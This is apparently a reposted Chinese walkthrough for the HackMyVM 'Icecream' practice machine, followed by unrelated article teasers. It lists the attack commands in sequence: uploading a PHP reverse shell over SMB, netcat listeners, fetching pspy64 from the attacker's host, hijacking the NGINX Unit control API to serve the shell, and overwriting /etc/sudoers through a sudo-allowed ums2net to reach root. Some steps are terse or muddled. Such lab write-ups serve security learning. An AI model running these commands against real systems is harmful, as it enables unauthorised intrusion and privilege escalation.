hackmyvm-Icecream

hackmyvm-Icecream

news2025/4/22 8:48:12

arp-scan -l

nmap -sS -v 192.168.222.106

enum4linux 192.168.222.106

445端口

smbmap -H 192.168.222.106

icecream为只读模式

smbclient \\192.168.222.106\icecream

反弹shell(上传put php-reverse-shell.php)

开启监听

nc -lnvp 1234

拿到webshell

cat /etc/passwd

9000端口

访问9000端口

这段 JSON 数据看起来是来自 NGINX Unit 的状态页面输出。NGINX Unit 是 NGINX 提供的一种应用程序服务器，旨在支持多种编程语言（如 Python、PHP、Perl、Ruby、Java 等），并允许开发人员直接在其上托管和运行应用程序。该数据表示了当前运行状态和配置。

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 'http://192.168.222.106:9000/'

扫到三个目录

开启http服务

python3 -m http.server 9000

切换到tmp目录，上传pspy64

wget http://192.168.222.149:9000/pspy64

运行pspy64

./pspy64

curl http://192.168.222.106:9000/config

curl http://192.168.222.106:9000/config/applications -X PUT -d '{"sb":{"type":"php","root":"/tmp","script":"php-reverse-shell.php"}}'

curl http://192.168.222.106:9000/config

curl http://192.168.222.106:9000/config/routes -X PUT -d '[{"action":{"share":"/tmp/php-reverse-shell.php$uri","fallback":{"pass":"applications/sb"}}}]'

curl http://192.168.222.106:9000/config/listeners -X PUT -d '{"*:8400":{"pass":"routes"}}'

curl http://192.168.222.106:8400/php-reverse-shell.php

nc -lnvp 1234

sudo -l

查看当前用户或指定用户在系统中被授予的 sudo 权限的命令,可以了解用户可以以 root 或其他用户身份运行哪些命令，以及是否需要输入密码。

sudo -l：查看当前用户的 sudo 权限。
sudo -l -U username：查看指定用户（username）的 sudo 权限。

User ice may run the following commands on icecream:

(ALL) NOPASSWD: /usr/sbin/ums2net

用户 ice 在主机 icecream 上被授予了以 root 权限运行 /usr/sbin/ums2net 命令的权限，且无需输入密码。

1. 解释

(ALL)：表示用户 ice 可以以任何用户身份（包括 root）运行命令。
NOPASSWD：表示运行该命令时无需输入密码。
/usr/sbin/ums2net：这是用户 ice 被允许运行的特定命令。

2. 如何配置的？

这种权限通常通过 /etc/sudoers 文件或 /etc/sudoers.d/ 目录中的配置文件设置。例如，以下行可能存在于配置文件中：

ice ALL=(ALL) NOPASSWD: /usr/sbin/ums2net

3. 检查配置

您可以通过以下命令查看用户 ice 的 sudo 权限：

sudo -l -U ice

提权 root

写一个公钥

ssh-keygen -t rsa -b 4096 -C "your_email@example.com"

cd /root/.ssh

mkdir .ssh

cd .ssh

authorized_keys为kali中id_rsa.pub中的内容

chmod -R 700 .ssh

ssh ice@192.168.222.106

echo '3009 of=/etc/sudoers' > a.conf

sudo /usr/sbin/ums2net -c a.conf -d=c

echo -ne "ice ALL=(ALL) NOPASSWD: ALL \n #"|nc 192.168.222.106 3009 //执行完这个命令之后ctrl+c

sudo -l

sudo su -

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/2320228.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

告别低效人工统计！自动计算计划进度

告别低效人工统计！自动计算计划进度

实时监控任务进度一直是项目管理中的一项巨大挑战。人工统计方式不仅耗时耗力，而且往往由于信息传递的延迟和人为误差，导致无法实时获得准确的项目进展信息。这种不准确性可能掩盖潜在的风险点，从而影响项目的整体进度和成果。 Ganttable …

阅读更多...

AI比人脑更强，因为被植入思维模型【16】反脆弱

AI比人脑更强，因为被植入思维模型【16】反脆弱

毛选中就有言，不经历困难，我们就不会掌握战胜困难的方法。这个世界纷繁复杂，不是强者总是运气好，而是他们能够失败后快速复原，不断找到战胜困难的方法。定义马斯洛需求层次模型是一种将人类需求从低到高按层次进…

阅读更多...

L2TP实验

L2TP实验

放开安全策略机制，FW1不配IP [FW1]firewall zone trust [FW1-zone-trust]add interface GigabitEthernet 1/0/0 [FW1]security-policy [FW1-policy-security]default action permit FW2 和FW3 [FW2]interface g1/0/1 [FW2-GigabitEthernet1/0/1]ip address 2…

阅读更多...

【数据预测】基于遗传算法GA的LSTM光伏功率预测 GA-LSTM光伏功率预测【Matlab代码#91】

【数据预测】基于遗传算法GA的LSTM光伏功率预测 GA-LSTM光伏功率预测【Matlab代码#91】

文章目录【可更换其他算法，获取资源请见文章第6节：资源获取】1. 遗传算法GA2. 长短期记忆网络LSTM3. 基于GA-LSTM的光伏功率预测4. 部分代码展示5. 运行结果展示6. 资源获取【可更换其他算法，获取资源请见文章第6节：资源获取】 …

阅读更多...

【记录一下】LMDeploy学习笔记及遇到的问题

【记录一下】LMDeploy学习笔记及遇到的问题

LMDeploy 是一个用于大型语言模型（LLMs）和视觉-语言模型（VLMs）压缩、部署和服务的 Python 库。其核心推理引擎包括 TurboMind 引擎和 PyTorch 引擎。前者由 C 和 CUDA 开发，致力于推理性能的优化，而后者纯…

阅读更多...

HC-05与HC-06蓝牙配对零基础教程以及openmv识别及远程传输项目的概述

HC-05与HC-06蓝牙配对零基础教程以及openmv识别及远程传输项目的概述

这个是上一年的项目，之前弄得不怎么完整，只有一个openmv的，所以openmv自己去我主页找，这篇主要讲蓝牙这个是我在使用openmv连接单片机1然后单片机1与单片机2通过蓝牙进行通信最终实现的效果是：openmv识别到图形和数…

阅读更多...

Transformer-GRU、Transformer、CNN-GRU、GRU、CNN五模型多变量回归预测

Transformer-GRU、Transformer、CNN-GRU、GRU、CNN五模型多变量回归预测

Transformer-GRU、Transformer、CNN-GRU、GRU、CNN五模型多变量回归预测目录 Transformer-GRU、Transformer、CNN-GRU、GRU、CNN五模型多变量回归预测预测效果基本介绍程序设计参考资料预测效果基本介绍 Transformer-GRU、Transformer、CNN-GRU、GRU、CNN五模型多变量回归预…

阅读更多...

OpenLayers集成天地图服务开发指南

OpenLayers集成天地图服务开发指南

以下是一份面向GIS初学者的OpenLayers开发详细教程，深度解析代码： 一、开发环境搭建 1.1 OpenLayers库引入  <link rel"stylesheet" href"https://cdn.jsdelivr.net/npm/ollatest/ol.c…

阅读更多...

VBA-Excel

VBA-Excel

VBA 一、数据类型与变量常用数据类型： Byte：字节型，0~255。Integer：整数型，用于存储整数值，范围 -32768 到 32767。Long：长整型，可存储更大范围的整数，范围 -214748364…

阅读更多...

OpenHarmony 开源鸿蒙北向开发——linux使用make交叉编译第三方库

OpenHarmony 开源鸿蒙北向开发——linux使用make交叉编译第三方库

这几天搞鸿蒙，需要编译一些第三方库到鸿蒙系统使用。头疼死了，搞了一个多星期总算搞定了。开贴记坑。一、SDK下载 1.下载在linux下使用命令 wget https://cidownload.openharmony.cn/version/Master_Version/OpenHarmony_5.1.0.54/20250313_02…

阅读更多...

【第14届蓝桥杯C/C++B组省赛】01串的熵

【第14届蓝桥杯C/C++B组省赛】01串的熵

问题描述算法思想首先分析题目中给出的公式 S 100时，其信息熵为 H(S)−p(0)log2(p(0)) − p(0)log2(p(0)) − p(1)log2(p(1)) 继续化简公式得设0出现的次数为x，1出现的次数为3-x H(S)−x * p(0) * log2(p(0)) − (3-x) * p(1) * log2(p(1)…

阅读更多...

鸿蒙harmonyOS笔记：练习CheckBoxGroup获取选中的值

鸿蒙harmonyOS笔记：练习CheckBoxGroup获取选中的值

除了视觉效果实现全选和反选以外，咱们经常需要获取选中的值，接下来看看如何实现。核心步骤： 1. 给 CheckBoxGroup 注册 onChange。 2. CheckBox 添加 name 属性。 3. 在 onChange 的回调函数中获取选中的 name 属性。事件&#xff1a…

阅读更多...

收数据花式画图plt实战

收数据花式画图plt实战

目录 Python plt想把纵坐标化成对数形式代码子图ax. 我又有ax scatter，又有ax plot，都要去对数数字接近0，取对数没有定义，怎么办创建数据添加一个小的常数以避免对数未定义的问题创建一个figure和一个子图ax 在子图a…

阅读更多...

系统架构书单推荐（一）领域驱动设计与面向对象

系统架构书单推荐（一）领域驱动设计与面向对象

本文主要是个人在学习过程中所涉猎的一些经典书籍，有些已经阅读完，有些还在阅读中。于我而言，希望追求软件系统设计相关的原则、方法、思想、本质的东西，并希望通过不断的学习、实践和积累，提升自身的知识和认知。希望…

阅读更多...

Centos6配置yum源

Centos6配置yum源

Centos6配置yum源为Centos6配置CentOS Vault源—防止yum源过期为Centos6配置epel源为Centos6配置ELRepo源---已ELRepo被官方清空Centos6安装dockerdocker配置国内镜像加速为Centos6配置CentOS Vault源—防止yum源过期参考：https://mirrors.ustc.edu.cn/help/cen…

阅读更多...

CVPR 2025 | 文本和图像引导的高保真3D数字人高效生成GaussianIP

CVPR 2025 | 文本和图像引导的高保真3D数字人高效生成GaussianIP

小小宣传一下CVPR 2025的工作GaussianIP。 arXiv：https://arxiv.org/abs/2503.11143 Github：https://github.com/silence-tang/GaussianIP 欢迎star, issue~ 摘要文本引导的3D人体生成随着高效3D表示及2D升维方法（如SDS）的发展…

阅读更多...

Cursor从小白到专家

Cursor从小白到专家

文章目录 1：简单开发一个贪吃蛇游戏规则设置提示词 cursor开发小工具开发整体步骤创建.cursorrules输入提示词composer模式chat模式执行cursor accept all发布到线上进行分享 cursor开发一个浏览器插件创建.cursorrulescursor rules范例集工具输入提示词执行curso…

阅读更多...

使用C++在Qt框架下调用DeepSeek的API接口实现自己的简易桌面小助手

使用C++在Qt框架下调用DeepSeek的API接口实现自己的简易桌面小助手

项目背景随着DeepSeek的爆火，最近的DeepSeek也进行了新一轮技术的更新，为了拥抱新时代，我们也要不断学习新的知识，难的底层原理我们接触不到，简单的调用还能难住我们？ 因为在网络上搜集到的资源都是用Py…

阅读更多...

【信息系统项目管理师】【高分范文】【历年真题】论信息系统项目的风险管理

【信息系统项目管理师】【高分范文】【历年真题】论信息系统项目的风险管理

【手机端浏览】☞【信息系统项目管理师】【高分范文】【历年真题】论信息系统项目的风险管理 2023年上半年考题【题目】论信息系统项目的风险管理项目风险管理旨在识别和管理未被项目计划及其他过程所管理的风险，如果不妥善管理，这些风险可能导致项…

阅读更多...

Debain-12.9使用vllm部署内嵌模型/embedding

Debain-12.9使用vllm部署内嵌模型/embedding

Debain-12.9使用vllm部署内嵌模型/embedding 基础环境准备下载模型部署模型注册dify模型基础环境准备基础环境安装下载模型 modelscope download --model BAAI/bge-m3 --local_dir BAAI/bge-m3部署模型 vllm serve ~/ollama/BAAI/bge-m3 --served-model-name bge-m3 --t…

阅读更多...

推荐文章

最新文章